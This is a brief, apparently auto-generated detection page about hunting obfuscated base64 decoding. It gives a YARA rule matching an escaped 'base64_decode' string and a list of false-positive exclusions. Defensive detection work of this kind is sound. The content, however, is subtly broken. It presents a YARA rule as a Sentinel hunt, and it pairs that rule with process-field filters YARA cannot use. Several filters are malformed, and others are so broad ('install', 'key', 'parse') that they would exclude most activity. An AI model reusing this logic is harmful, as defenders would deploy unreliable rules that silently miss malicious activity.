Adversaries may use obfuscated base64 decoding to encode malicious payloads, evading simple string-based detection mechanisms. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential command and control communications or payload delivery attempts that bypass basic detection rules.
YARA Rule
rule obf_base64_decode {
strings:
$ = "\\x62\\x61\\x73\\145\\x36\\x34\\x5f\\x64\\x65\\143\\x6f\\144\\145"
condition:
any of them and filesize < 500KB
}This YARA rule can be deployed in the following contexts:
Scenario: Base64 decoding of a legitimate configuration file during a scheduled backup job
Filter/Exclusion: process.parent_process_name == "backup_service.exe" or process.command_line contains "backup"
Scenario: Base64 decoding of a script used by a system management tool like Ansible or Puppet
Filter/Exclusion: process.name contains "ansible" or "puppet" or process.command_line contains "playbook"
Scenario: Base64 decoding of a payload during a legitimate software update process (e.g., using Chocolatey or Scoop)
Filter/Exclusion: process.name contains "choco" or "scoop" or process.command_line contains "install"
Scenario: Base64 decoding of a file during a legitimate log parsing task using ELK Stack or Splunk
Filter/Exclusion: process.name contains "logstash" or "splunkd" or process.command_line contains "parse"
Scenario: Base64 decoding of a certificate or key file during a certificate management task using CertMgr or OpenSSL
Filter/Exclusion: process.name contains "certmgr" or "openssl" or process.command_line contains "cert" or "key"